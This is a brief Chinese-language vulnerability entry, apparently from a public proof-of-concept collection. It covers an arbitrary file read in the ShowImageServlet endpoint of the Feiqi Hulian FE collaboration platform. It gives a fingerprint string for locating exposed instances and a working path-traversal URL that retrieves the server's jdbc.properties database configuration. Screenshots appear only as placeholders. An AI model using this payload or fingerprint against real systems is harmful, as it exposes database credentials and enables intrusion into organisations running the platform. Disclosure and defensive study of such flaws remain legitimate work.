飞企互联 FE业务协作平台 ShowImageServlet 任意文件读取漏洞

漏洞描述

飞企互联 FE业务协作平台 ShowImageServlet 接口存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中敏感文件

漏洞影响

飞企互联 FE业务协作平台

网络测绘

"flyrise.stopBackspace.js"

漏洞复现

登陆页面

image-20230828145057107

验证POC

/servlet/ShowImageServlet?imagePath=../web/fe.war/WEB-INF/classes/jdbc.properties&print

image-20230828145109229